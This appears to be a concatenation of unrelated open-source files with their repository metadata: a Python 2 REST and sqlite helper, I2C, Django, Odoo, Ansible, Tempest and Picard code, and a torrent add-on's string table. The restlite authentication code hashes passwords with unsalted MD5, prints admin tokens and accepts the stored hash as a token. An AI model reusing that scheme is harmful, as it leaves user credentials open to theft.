isinstance(x[0], basestring)]: return dict([(x[0], list2dict(x[1])) for x in value]) elif isinstance(value, list): return [list2dict(x) for x in value] else: return value return json.dumps(list2dict(value)) def xml(value): '''The function converts the supplied value to XML representation. It assumes the unified list format of value. Typically you just call represent(value, type=request['ACCEPT']) instead of manually invoking this method. To be consistent with str(obj) function which uses obj.__str__() method if available, xml() uses obj._xml_() method if available on value. Otherwise it checks obj._list_() method if available to get the unified list format. Otherwise it assumes that the value is in unified list format. The _xml_ and _list_ semantics allow you to customize the XML representation of your object, if needed. >>> value = ('file', (('name', 'myfile.txt'), ('acl', [('allow', 'kundan'), ('allow', 'admin')]))) >>> xml(value) '<file><name>myfile.txt</name><acl><allow>kundan</allow><allow>admin</allow></acl></file>' ''' if hasattr(value, '_xml_') and callable(value._xml_): return value._xml_() if hasattr(value, '_list_') and callable(value._list_): value = value._list_() if isinstance(value, tuple) and len(value) == 2 and isinstance(value[0], basestring): if value[1] is None: return '<%s />'%(value[0]) else: return '<%s>%s</%s>'%(value[0], xml(value[1]), value[0]) elif isinstance(value, list) or isinstance(value, tuple): return ''.join(xml(x) for x in value) else: return str(value) if value is not None else None def prettyxml(value): '''This function is similar to xml except that it invokes minidom's toprettyxml() function. Note that due to the addition of spaces even in text nodes of prettyxml result, you cannot use this reliably for structured data representation, and should use only for debug trace of XML. ''' return minidom.parseString(xml(value)).toprettyxml().encode('utf-8') def represent(value, mime_type='*/*'): '''You can use this method to convert a unified value to JSON, XML or text based on the mime_type. The JSON representation is preferred if mime_type is default, otherwise the mime_type values of "application/json", "text/xml" and "text/plain" map to tojson, xml and str functions, respectively. If you would like to customize the representation of your object, you can define _json_(), _xml_() and/or __str__() methods on your object. Note that _json_ and _xml_ fall back to _list_ if available for getting the unified list representation, and __str__ falls back to __repr__ if available. The return value is a tuple containing mime_type and value. >>> class user: ... def __init__(self, name): self.name = name ... def _list_(self): return ('allow', self.name) >>> u1, u2 = user('kundan'), user('admin') >>> value = ('file', (('name', 'myfile.txt'), ('acl', [u1, u2]))) >>> represent(value, mime_type='application/json')[1] '{"file": {"name": "myfile.txt", "acl": [{"allow": "kundan"}, {"allow": "admin"}]}}' >>> represent(value, mime_type='text/xml')[1] '<file><name>myfile.txt</name><acl><allow>kundan</allow><allow>admin</allow></acl></file>' ''' types = map(lambda x: x.lower(), re.split(r'[, \t]+', mime_type)) if '*/*' in types: types.append(defaultType) for mime_type, func in (('application/json', tojson), ('text/xml', xml), ('text/plain', str)): if mime_type in types: return (mime_type, func(value)) return ('application/octet-stream', str(value)) #------------------------------------------------------------------------------ # High Level API: @resources #------------------------------------------------------------------------------ class Request(dict): '''A request object is supplied to the resource definition in various methods: GET, PUT, POST, DELETE. It is a dictionary containing env information. Additionally, all the matching attributes from the router are stored as properties of this object, extracted from env['wsgiorg.routing_args'].''' def __init__(self, env, start_response): self.update(env.iteritems()) self.__dict__.update(env.get('wsgiorg.routing_args', {})) self.start_response = start_response def response(self, value, mime_type=None): mime_type, result = represent(value, mime_type if mime_type is not None else self.get('ACCEPT', defaultType)) self.start_response('200 OK', [('Content-Type', mime_type)]) return result class Status(Exception): '''The exception object that is used to throw HTTP response exception, e.g., raise Status, '404 Not Found'. The resource definition can throw this exception. ''' def resource(func): '''A decorator to convert a function with nested function GET, PUT, POST and/or DELETE to a resource. The resource object allows you to write applications in high-level semantics and translate it to wsgiref compatible handler that is handled the router. The GET and DELETE methods take one argument (request) of type Request, whereas PUT and POST take additional argument (first is request of type Request, and second is) entity extracted from message body. Note that the function definition that is made as a resource, must have a "return locals()" at the end so that all the methods GET, PUT, POST and/or DELETE are returned when function is called with no arguments. >>> @resource ... def files(): ... def GET(request): ... return represent(('files', [('file', 'myfile.txt')]), type='text/xml')[1] ... def PUT(request, entity): ... pass ... return locals() >>> # test using the following code >>> env, start_response = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/xml/files', 'SCRIPT_NAME': '', 'QUERY_STRING': ''}, lambda x,y: (x, y) >>> print files(env, start_response) ['<files><file>myfile.txt</file></files>'] ''' method_funcs = func() if method_funcs is None: raise Status, '500 No "return locals()" in the definition of resource "%r"'%(func.__name__) def handler(env, start_response): if env['REQUEST_METHOD'] not in method_funcs: raise Status, '405 Method Not Allowed' req = Request(env, start_response) if env['REQUEST_METHOD'] in ('GET', 'HEAD', 'DELETE'): result = method_funcs[env['REQUEST_METHOD']](req) elif env['REQUEST_METHOD'] in ('POST', 'PUT'): if 'BODY' not in env: try: env['BODY'] = env['wsgi.input'].read(int(env['CONTENT_LENGTH'])) except (TypeError, ValueError): raise Status, '400 Invalid Content-Length' if env['CONTENT_TYPE'].lower() == 'application/json' and env['BODY']: try: env['BODY'] = json.loads(env['BODY']) except: raise Status, '400 Invalid JSON content' result = method_funcs[env['REQUEST_METHOD']](req, env['BODY']) return [result] if result is not None else [] return handler def bind(obj): '''Bind the given object to a resource. It returns a wsgiref compliant application for that resource. Suppose an object obj={'kundan': user1, 'singh': user2} is bound to a resource '/users' then GET, PUT, POST and DELETE are implemented on that obj as 'GET /users' returns the obj description with its properties and methods. 'GET /users/kundan' returns the user1 object description. 'PUT /users/kundan' replaces user1 with the supplied value. 'POST /users' adds a new property, attribute or list element. ''' def handler(env, start_response): current, result = obj, None if env['REQUEST_METHOD'] == 'GET': while env['PATH_INFO']: print 'path=', env['PATH_INFO'] part, index = None, env['PATH_INFO'].find('/', 1) if index < 0: index = len(env['PATH_INFO']) part, env['SCRIPT_NAME'], env['PATH_INFO'] = env['PATH_INFO'][1:index], env['SCRIPT_NAME'] + env['PATH_INFO'][:index], env['PATH_INFO'][index:] if not part: break if current is None: raise Status, '404 Object Not Found' try: current = current[int(part)] if isinstance(current, list) else current[part] if isinstance(current, dict) else current.__dict__[part] if hasattr(current, part) else None except: print sys.exc_info(); raise Status, '400 Invalid Scope %r'%(part,) if current is None: result = None elif isinstance(current, list): result = [('url', '%s/%d'%(env['SCRIPT_NAME'], i,)) for i in xrange(len(current))] elif isinstance(current, dict): result = tuple([(k, v if isinstance(v, basestring) else '%s/%s'%(env['SCRIPT_NAME'], k)) for k, v in current.iteritems()]) else:result = current mime_type, value = represent(('result', result), mime_type=env.get('ACCEPT', 'application/json')) start_response('200 OK', [('Content-Type', mime_type)]) return [value] else: raise Status, '405 Method Not Allowed' return handler #------------------------------------------------------------------------------ # Data Model with sqlite3 #------------------------------------------------------------------------------ class Model(dict): '''A data model that abstracts the SQL table creation and uses sqlite3. Instead of defining a ORM (object-relation mapping), this just lets the application handle the SQL commands. The only convenience of this class is to allow creating the SQL tables using text description of the data model, define python class for each table that can constructed using all the values of a row of that table, and define sql and sql1 convenience methods. >>> desc = """ ... user ... id integer primary key ... name text ... ... files ... id integer primary key ... name text not null ... owner int ... created datetime ... size int default 0 ... foreign key (owner) references user(id) ... """ >>> m1 = Model() >>> m1.create(desc) >>> c1 = m1.sql('INSERT INTO user VALUES (NULL, ?)', ('Kundan Singh',)) >>> c2 = m1.sql('INSERT INTO user VALUES (NULL, ?)', ('Alok Singh',)) >>> row = m1.sql1('SELECT * FROM user WHERE id=?', (1,)) >>> u1 = m1['user'](*row) >>> print u1 'id'=1, 'name'=u'Kundan Singh' >>> print u1._list_() ('user', (('id', 1), ('name', u'Kundan Singh'))) >>> print 'table=%r attrs=%r properties=%r'%(u1.__class__._table_, u1.__class__._attrs_, u1.__dict__) table='user' attrs=['id', 'name'] properties={'id': 1, 'name': u'Kundan Singh'} ''' def __init__(self, conn=None): '''Construct the model using optional sqlite3 connection. If missing, use a in-memory database.''' if conn is None: self.conn = sqlite3.connect(':memory:') self.conn.isolation_level = None else: self.conn = conn def close(self): '''Close the connection with the database.''' self.conn.close() self.conn = None def sql(self, *args): '''Execute a single SQL command and return the cursor. For select commands application should use the cursor as an iterator, or invoke fetchone or fetchall as applicable.''' if _debug: print 'SQL: ' + ': '.join(map(str, args)) return self.conn.execute(*args) def sql1(self, *args): '''Execute a single SELECT SQL command and return a single row of the result.''' return self.sql(*args).fetchone() def create(self, data_model, createTable=True, createType=True): '''Create the SQL tables using the data_model text description. An example text description is shown below. It defines two tables, user and files. Note that the primary key of id must be defined as "integer" instead of "int" or other variation for auto-increment of the id to work. ''' # list of tuples (table-name, [list of attributes]) tables = [(x[0], [y.strip() for y in x[1:]]) for x in (z.split('\n') for z in re.split(r'\r?\n\r?\n', re.sub(r'[ \t]{2,}', ' ', '\n'.join(map(str.rstrip, data_model.strip().split('\n'))))))] if createTable: map(lambda t: self.sql("CREATE TABLE %s (%s)"%(t[0], ', '.join(t[1]))), tables) if createType: for name, attrs in tables: class klass(object): _defn_ = [(y, z) for y, z in (x.split(' ', 1) for x in attrs) if y.lower() not in ('foreign', 'primary', 'key')] __doc__ = name + '\n ' + '\n '.join(['%s\t%s'%(x, y) for x, y in _defn_]) #@ReservedAssignment _table_, _attrs_, _defn_ = name, [x for x, y in _defn_], [y for x, y in _defn_] def __init__(self, *args, **kwargs): keys = self.__class__._attrs_ for x in keys: self.__dict__[x] = None for x, y in zip(keys[:len(args)], args): self.__dict__[x] = y for k, v in kwargs.iteritems(): self.__dict__[k] = v def __str__(self): return ', '.join(['%r=%r'%(x, self.__dict__[x]) for x in self.__class__._attrs_ if x in self.__dict__]) def _list_(self): return (self.__class__._table_, tuple((k, self.__dict__[k]) for k in self.__class__._attrs_ if k in self.__dict__)) self[name] = klass #------------------------------------------------------------------------------ # Authentication #------------------------------------------------------------------------------ _loginTable = ''' user_login id integer primary key email text not null realm text not null auth_hash tinyblob(32) not null token tinyblob(32) ''' class AuthModel(Model): '''Authenticated Model class, which creates a database table of type user_login and uses that to provide various authentication methods.''' def __init__(self, conn=None): Model.__init__(self, conn) self.mypass = hashlib.md5(str(id(self)) + str(time.time())).hexdigest() self.create(_loginTable) def auth_hash(self, email, realm, password): return hashlib.md5('%s:%s:%s'%(email, realm, password)).hexdigest() def token(self, user_id): tm = '%010x'%(int(time.time()),) return hashlib.md5(self.mypass + str(user_id) + tm).hexdigest() + tm def valid(self, user_id, token): auth_hash, tm = token[:-10], token[-10:] return hashlib.md5(self.mypass + str(user_id) + tm).hexdigest() == auth_hash def register(self, email, realm, password='', auth_hash=None): if not auth_hash: auth_hash = self.auth_hash(email, realm, password) self.sql('INSERT INTO user_login VALUES (NULL, ?, ?, ?, NULL)', (email, realm, auth_hash)) user_id = self.sql1('SELECT last_insert_rowid()')[0] self.sql('UPDATE user_login SET token=? WHERE id=?', (self.token(user_id), user_id)) return user_id def login(self, request): hdr = request.get('HTTP_AUTHORIZATION', None) if hdr: method, value = map(str.strip, hdr.split(' ', 1)) if method == 'Basic': email, password = base64.b64decode(value).split(':', 1) found = self.sql1('SELECT id, auth_hash FROM user_login WHERE email=?', (email,)) if not found: request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%('localhost',))]) raise Status, '401 Not Found' user_id, auth_hash = found; realm = "localhost" # TODO: implement this hash_recv = self.auth_hash(email, realm, password) if auth_hash != hash_recv: request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%(realm,))]) raise Status, '401 Unauthorized' token = self.token(user_id) self.sql('UPDATE user_login SET token=? WHERE id=?', (token, user_id)) request['COOKIE']['token'] = token; request['COOKIE']['token']['path'] = '/' request['COOKIE']['user_id'] = user_id; request['COOKIE']['user_id']['path'] = '/' return (user_id, email, token) elif (hasattr(request, 'user_id') or hasattr(request, 'email')) and hasattr(request, 'token'): if request.email == 'admin': adminhash = hashlib.md5('%s::%s'%(request.email, self.mypass)).hexdigest() print request.token, adminhash if adminhash != request.token: raise Status, '401 Not Authorized' user_id, email, token = 0, request.email, adminhash else: found = self.sql1('SELECT id, email, token FROM user_login WHERE (id=? OR email=?) AND (token=? OR auth_hash=?)', (request.user_id, request.email, request.token, request.token)) if not found: if not self.sql1('SELECT id FROM user_login WHERE id=? OR email=?', (request.user_id, request.email)): raise Status, '404 Not Found' else: raise Status, '401 Unauthorized' user_id, email, token = int(found[0]), found[1], found[2] if token != request.token: token = self.token(user_id) self.sql('UPDATE user_login SET token=? WHERE id=?', (token, user_id)) request['COOKIE']['token'] = token; request['COOKIE']['token']['path'] = '/' request['COOKIE']['user_id'] = user_id; request['COOKIE']['user_id']['path'] = '/' return (user_id, email, token) elif 'COOKIE' in request and 'user_id' in request['COOKIE'] and 'token' in request['COOKIE']: user_id, token = int(request['COOKIE'].get('user_id').value), request['COOKIE'].get('token').value if user_id == 0: email = 'admin'; auth_hash = hashlib.md5('%s::%s'%(email, self.mypass)).hexdigest() if auth_hash != token: raise Status, '401 Not Authorized as Admin' else: found = self.sql1('SELECT email FROM user_login WHERE id=? AND token=?', (user_id, token)) if not found: request['COOKIE']['user_id']['expires'] = 0 request['COOKIE']['user_id']['path'] = '/' request['COOKIE']['token']['expires'] = 0 request['COOKIE']['token']['path'] = '/' realm = "localhost" request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%(realm,))]) raise Status, '401 Unauthorized' email = found[0] return (user_id, email, token) else: realm = "localhost" request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%(realm,))]) raise Status, '401 Unauthorized' def logout(self, request): if 'COOKIE' in request and 'user_id' in request['COOKIE'] and 'token' in request['COOKIE']: user_id, token, request['COOKIE']['token']['expires'] = request['COOKIE']['user_id'].value, request['COOKIE']['token'].value, 0 if user_id != 0: self.sql('UPDATE user_login SET token=NULL WHERE id=? AND token=?', (user_id, token)) #------------------------------------------------------------------------------ # Test and Examples #------------------------------------------------------------------------------ if __name__ == '__main__': import doctest _debug = False doctest.testmod()
lbovet/platane
restlite.py
Python
lgpl-3.0
29,388
0.010617
import smbus, sys import time bus = smbus.SMBus(1) # i2c address address = 0x04 if len(sys.argv) < 3: print -1 sys.exit() cmd = sys.argv[1] msg = sys.argv[2] msAr = [] for x in msg: msAr.append(ord(x)) def writeNumber(): #bus.write_byte(address, value) bus.write_i2c_block_data(address,ord(cmd), msAr) return -1 def readNumber(): number = bus.read_byte(address) # number = bus.read_byte_data(address, 1) return number writeNumber() # sleep one second time.sleep(1) res = readNumber() print res
a2ron44/alfredHomeAutomation
alfredPHP/controller.py
Python
gpl-3.0
539
0.012987
# encoding=utf-8 import sqlalchemy from sqlalchemy.engine import create_engine from sqlalchemy.pool import SingletonThreadPool from terroroftinytown.tracker.model import Session, Base class Database(object): def __init__(self, path, delete_everything=False): if path.startswith('sqlite:'): self.engine = create_engine(path, poolclass=SingletonThreadPool) sqlalchemy.event.listen( self.engine, 'connect', self._apply_pragmas_callback) else: self.engine = create_engine(path) Session.configure(bind=self.engine) if delete_everything == 'yes-really!': self._delete_everything() Base.metadata.create_all(self.engine) @classmethod def _apply_pragmas_callback(cls, connection, record): connection.execute('PRAGMA journal_mode=WAL') connection.execute('PRAGMA synchronous=NORMAL') def _delete_everything(self): Base.metadata.drop_all(self.engine)
hugovk/terroroftinytown
terroroftinytown/tracker/database.py
Python
mit
992
0
import os CACHE_TYPE = os.environ.get('CACHE_TYPE', 'redis').strip() if CACHE_TYPE == 'redis': CACHES = { 'default': { 'BACKEND': 'django_redis.cache.RedisCache', 'LOCATION': os.environ.get('CACHE_URL', 'redis://redis:6379/1').strip(), 'OPTIONS': { 'CLIENT_CLASS': 'django_redis.client.DefaultClient', 'PICKLE_VERSION': 2, 'SERIALIZER':'astrobin.cache.CustomPickleSerializer', }, 'KEY_PREFIX': 'astrobin' } } elif CACHE_TYPE == 'locmem': CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', } } else: CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.dummy.DummyCache', } }
astrobin/astrobin
astrobin/settings/components/caches.py
Python
agpl-3.0
824
0.002427
# -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. from . import mrp_document from . import mrp_abstract_workorder from . import res_config_settings from . import mrp_bom from . import mrp_routing from . import mrp_workcenter from . import mrp_production from . import stock_traceability from . import mrp_unbuild from . import mrp_workorder from . import product from . import res_company from . import stock_move from . import stock_picking from . import stock_production_lot from . import stock_rule from . import stock_scrap from . import stock_warehouse
t3dev/odoo
addons/mrp/models/__init__.py
Python
gpl-3.0
608
0
# -*- coding: utf-8 -*- # # Copyright: (c) 2018, F5 Networks Inc. # GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import json import pytest import sys if sys.version_info < (2, 7): pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7") from ansible.module_utils.basic import AnsibleModule try: from library.modules.bigiq_device_facts import Parameters from library.modules.bigiq_device_facts import SystemInfoFactManager from library.modules.bigiq_device_facts import ModuleManager from library.modules.bigiq_device_facts import ArgumentSpec # In Ansible 2.8, Ansible changed import paths. from test.units.compat import unittest from test.units.compat.mock import Mock from test.units.compat.mock import patch from test.units.modules.utils import set_module_args except ImportError: from ansible.modules.network.f5.bigiq_device_facts import Parameters from ansible.modules.network.f5.bigiq_device_facts import SystemInfoFactManager from ansible.modules.network.f5.bigiq_device_facts import ModuleManager from ansible.modules.network.f5.bigiq_device_facts import ArgumentSpec # Ansible 2.8 imports from units.compat import unittest from units.compat.mock import Mock from units.compat.mock import patch from units.modules.utils import set_module_args fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') fixture_data = {} def load_fixture(name): path = os.path.join(fixture_path, name) if path in fixture_data: return fixture_data[path] with open(path) as f: data = f.read() try: data = json.loads(data) except Exception: pass fixture_data[path] = data return data class TestParameters(unittest.TestCase): def test_module_parameters(self): args = dict( gather_subset=['system-info'], ) p = Parameters(params=args) assert p.gather_subset == ['system-info'] class TestManager(unittest.TestCase): def setUp(self): self.spec = ArgumentSpec() def test_get_facts(self, *args): set_module_args(dict( gather_subset=['system-info'], provider=dict( server='localhost', password='password', user='admin' ) )) fixture1 = load_fixture('load_shared_system_setup_1.json') module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) tm = SystemInfoFactManager(module=module) tm.read_collection_from_device = Mock(return_value=fixture1) # Override methods to force specific logic in the module to happen mm = ModuleManager(module=module) mm.get_manager = Mock(return_value=tm) results = mm.exec_module() assert results['changed'] is True assert 'system_info' in results
helldorado/ansible
test/units/modules/network/f5/test_bigiq_device_facts.py
Python
gpl-3.0
3,123
0.00064
# -*- coding: utf-8 -*- # Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore __protobuf__ = proto.module( package="google.cloud.securitycenter.v1p1beta1", manifest={"Source",}, ) class Source(proto.Message): r"""Security Command Center finding source. A finding source is an entity or a mechanism that can produce a finding. A source is like a container of findings that come from the same scanner, logger, monitor, etc. Attributes: name (str): The relative resource name of this source. See: https://cloud.google.com/apis/design/resource_names#relative_resource_name Example: "organizations/{organization_id}/sources/{source_id}". display_name (str): The source's display name. A source's display name must be unique amongst its siblings, for example, two sources with the same parent can't share the same display name. The display name must have a length between 1 and 64 characters (inclusive). description (str): The description of the source (max of 1024 characters). Example: "Web Security Scanner is a web security scanner for common vulnerabilities in App Engine applications. It can automatically scan and detect four common vulnerabilities, including cross-site-scripting (XSS), Flash injection, mixed content (HTTP in HTTPS), and outdated/insecure libraries.". canonical_name (str): The canonical name of the finding. It's either "organizations/{organization_id}/sources/{source_id}", "folders/{folder_id}/sources/{source_id}" or "projects/{project_number}/sources/{source_id}", depending on the closest CRM ancestor of the resource associated with the finding. """ name = proto.Field(proto.STRING, number=1,) display_name = proto.Field(proto.STRING, number=2,) description = proto.Field(proto.STRING, number=3,) canonical_name = proto.Field(proto.STRING, number=14,) __all__ = tuple(sorted(__protobuf__.manifest))
googleapis/python-securitycenter
google/cloud/securitycenter_v1p1beta1/types/source.py
Python
apache-2.0
2,762
0.000362
# Copyright 2013 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.api.compute import base from tempest.common.utils import data_utils from tempest import exceptions from tempest import test from tempest.test import attr from tempest.test import skip_because class ServersAdminV3Test(base.BaseV3ComputeAdminTest): """ Tests Servers API using admin privileges """ _interface = 'json' @classmethod def setUpClass(cls): super(ServersAdminV3Test, cls).setUpClass() cls.client = cls.servers_admin_client cls.non_admin_client = cls.servers_client cls.flavors_client = cls.flavors_admin_client cls.s1_name = data_utils.rand_name('server') resp, server = cls.create_test_server(name=cls.s1_name, wait_until='ACTIVE') cls.s1_id = server['id'] cls.s2_name = data_utils.rand_name('server') resp, server = cls.create_test_server(name=cls.s2_name, wait_until='ACTIVE') cls.s2_id = server['id'] def _get_unused_flavor_id(self): flavor_id = data_utils.rand_int_id(start=1000) while True: try: resp, body = self.flavors_client.get_flavor_details(flavor_id) except exceptions.NotFound: break flavor_id = data_utils.rand_int_id(start=1000) return flavor_id @attr(type='gate') def test_list_servers_by_admin(self): # Listing servers by admin user returns empty list by default resp, body = self.client.list_servers_with_detail() servers = body['servers'] self.assertEqual('200', resp['status']) self.assertEqual([], servers) @test.skip_because(bug='1265416') @attr(type='gate') def test_list_servers_by_admin_with_all_tenants(self): # Listing servers by admin user with all tenants parameter # Here should be listed all servers params = {'all_tenants': ''} resp, body = self.client.list_servers_with_detail(params) servers = body['servers'] servers_name = map(lambda x: x['name'], servers) self.assertIn(self.s1_name, servers_name) self.assertIn(self.s2_name, servers_name) @attr(type='gate') def test_admin_delete_servers_of_others(self): # Administrator can delete servers of others _, server = self.create_test_server() resp, _ = self.client.delete_server(server['id']) self.assertEqual('204', resp['status']) self.servers_client.wait_for_server_termination(server['id']) @attr(type='gate') def test_delete_server_while_in_error_state(self): # Delete a server while it's VM state is error resp, server = self.create_test_server(wait_until='ACTIVE') resp, body = self.client.reset_state(server['id'], state='error') self.assertEqual(202, resp.status) # Verify server's state resp, server = self.client.get_server(server['id']) self.assertEqual(server['status'], 'ERROR') resp, _ = self.client.delete_server(server['id']) self.assertEqual('204', resp['status']) @attr(type='gate') def test_reset_state_server(self): # Reset server's state to 'error' resp, server = self.client.reset_state(self.s1_id) self.assertEqual(202, resp.status) # Verify server's state resp, server = self.client.get_server(self.s1_id) self.assertEqual(server['status'], 'ERROR') # Reset server's state to 'active' resp, server = self.client.reset_state(self.s1_id, state='active') self.assertEqual(202, resp.status) # Verify server's state resp, server = self.client.get_server(self.s1_id) self.assertEqual(server['status'], 'ACTIVE') @attr(type='gate') @skip_because(bug="1240043") def test_get_server_diagnostics_by_admin(self): # Retrieve server diagnostics by admin user resp, diagnostic = self.client.get_server_diagnostics(self.s1_id) self.assertEqual(200, resp.status) basic_attrs = ['rx_packets', 'rx_errors', 'rx_drop', 'tx_packets', 'tx_errors', 'tx_drop', 'read_req', 'write_req', 'cpu', 'memory'] for key in basic_attrs: self.assertIn(key, str(diagnostic.keys())) @attr(type='gate') def test_list_servers_filter_by_error_status(self): # Filter the list of servers by server error status params = {'status': 'error'} resp, server = self.client.reset_state(self.s1_id, state='error') resp, body = self.non_admin_client.list_servers(params) # Reset server's state to 'active' resp, server = self.client.reset_state(self.s1_id, state='active') # Verify server's state resp, server = self.client.get_server(self.s1_id) self.assertEqual(server['status'], 'ACTIVE') servers = body['servers'] # Verify error server in list result self.assertIn(self.s1_id, map(lambda x: x['id'], servers)) self.assertNotIn(self.s2_id, map(lambda x: x['id'], servers)) @attr(type='gate') def test_rebuild_server_in_error_state(self): # The server in error state should be rebuilt using the provided # image and changed to ACTIVE state # resetting vm state require admin priviledge resp, server = self.client.reset_state(self.s1_id, state='error') self.assertEqual(202, resp.status) resp, rebuilt_server = self.non_admin_client.rebuild( self.s1_id, self.image_ref_alt) self.addCleanup(self.non_admin_client.wait_for_server_status, self.s1_id, 'ACTIVE') self.addCleanup(self.non_admin_client.rebuild, self.s1_id, self.image_ref) # Verify the properties in the initial response are correct self.assertEqual(self.s1_id, rebuilt_server['id']) rebuilt_image_id = rebuilt_server['image']['id'] self.assertEqual(self.image_ref_alt, rebuilt_image_id) self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id']) self.non_admin_client.wait_for_server_status(rebuilt_server['id'], 'ACTIVE', raise_on_error=False) # Verify the server properties after rebuilding resp, server = self.non_admin_client.get_server(rebuilt_server['id']) rebuilt_image_id = server['image']['id'] self.assertEqual(self.image_ref_alt, rebuilt_image_id)
ntymtsiv/tempest
tempest/api/compute/v3/admin/test_servers.py
Python
apache-2.0
7,222
0
# -*- coding: utf-8 -*- # # Picard, the next-generation MusicBrainz tagger # # Copyright (C) 2008 Lukáš Lalinský # Copyright (C) 2013, 2018-2021 Laurent Monin # Copyright (C) 2017 Sambhav Kothari # Copyright (C) 2018-2019 Philipp Wolfer # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. """Tom's lossless Audio Kompressor streams with APEv2 tags. TAK is a lossless audio compressor developed by Thomas Becker. For more information, see http://wiki.hydrogenaudio.org/index.php?title=TAK and http://en.wikipedia.org/wiki/TAK_(audio_codec) """ __all__ = ["TAK", "Open", "delete"] try: from mutagen.tak import ( Open, TAK, TAKHeaderError, TAKInfo, delete ) native_tak = True except ImportError: from mutagen import StreamInfo from mutagen.apev2 import ( APEv2File, delete, error, ) native_tak = False class TAKHeaderError(error): pass class TAKInfo(StreamInfo): """TAK stream information. Attributes: (none at the moment) """ def __init__(self, fileobj): header = fileobj.read(4) if len(header) != 4 or not header.startswith(b"tBaK"): raise TAKHeaderError("not a TAK file") @staticmethod def pprint(): return "Tom's lossless Audio Kompressor" class TAK(APEv2File): """TAK(filething) Arguments: filething (filething) Attributes: info (`TAKInfo`) """ _Info = TAKInfo _mimes = ["audio/x-tak"] @staticmethod def score(filename, fileobj, header): return header.startswith(b"tBaK") + filename.lower().endswith(".tak") Open = TAK
metabrainz/picard
picard/formats/mutagenext/tak.py
Python
gpl-2.0
2,426
0.000825
# -*- coding: utf-8 -*- ''' Torrenter v2 plugin for XBMC/Kodi Copyright (C) 2012-2015 Vadim Skorba v1 - DiMartino v2 https://forums.tvaddons.ag/addon-releases/29224-torrenter-v2.html This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ''' try: import xbmcaddon __settings__ = xbmcaddon.Addon(id='plugin.video.torrenter') language = ('en', 'ru', 'uk','he')[int(__settings__.getSetting("language"))] except: language = 'ru' def localize(text): dictionary = { 'he': { 'Seeds searching.': 'חיפוש זורעים', 'Please Wait': 'המתן', 'Information': 'מידע', 'Torrent downloading is stopped.': 'הורדה הופסקה', 'Search': 'חפש', 'Seeds': 'זורעים', 'Peers': 'יונקים', 'Materials are loading now.': 'עולה כעת', 'Search Phrase': 'חפש', 'Magnet-link is converting': 'הקובץ נטען', 'Error': 'טעות', 'Your library out of date and can\'t save magnet-links.': 'הספריה אינה מעודכנת', 'Bookmarks': 'סימניות', 'Logout': 'התנתק', 'Login': 'התחבר', 'Recent Materials': 'חומרים אחרונים ', 'Register': 'הרשם', 'Bookmark': 'סמניות', 'Item successfully added to Bookmarks': 'הפריט הוסף לסמניות', 'Item successfully removed from Bookmarks': 'הפריט הוסר מהסימניות בהצלחה', 'Bookmark not added': 'סימניה לא הוספה', 'Bookmark not removed': 'הסימניה לא הוסרה', 'Add To Bookmarks': 'הוסף לסימניות', 'Remove From Bookmarks': 'הסר מסימניות', 'Auth': 'אישור', 'Already logged in': 'Already logged in', 'Input Email (for password recovery):': 'Input Email (for password recovery):', 'Input Email:': 'Input Email:', 'Input Password (6+ symbols):': 'Input Password (6+ symbols):', 'Input Password:': 'Input Password', 'Login successfull': 'Login successfull', 'Login failed': 'Login failed', 'User not logged in': 'Пользователь не в системе', 'User successfully logged out': 'User successfully logged out', 'Preloaded: ': 'טוען מראש', 'Do you want to STOP torrent downloading and seeding?': 'להפסיק הורדת טורנט?', 'Torrent Downloading': 'טורנט בהורדה', 'Auth expired, please relogin': 'Auth expired, please relogin', 'Storage': 'אחסון', 'Storage has been cleared': 'אחסון נוקה', 'Clear Storage': 'נקה אחסון', 'Popular': 'פופולארי', 'Views': 'צפיות', 'Uploading': 'מעלה', 'Download': 'מוריד', 'Input symbols from CAPTCHA image:': 'Input symbols from CAPTCHA image:', 'Please, rate watched video:': 'Please, rate watched video:', 'Bad': 'Bad', 'So-So': 'So-So', 'Good': 'Good', 'Ratings': 'Ratings', 'Rating': 'דירוג', 'Retry': 'נסה שנית', '%ds has left': '%ds has left', 'File failed to play! Do you want to RETRY and buffer more?': 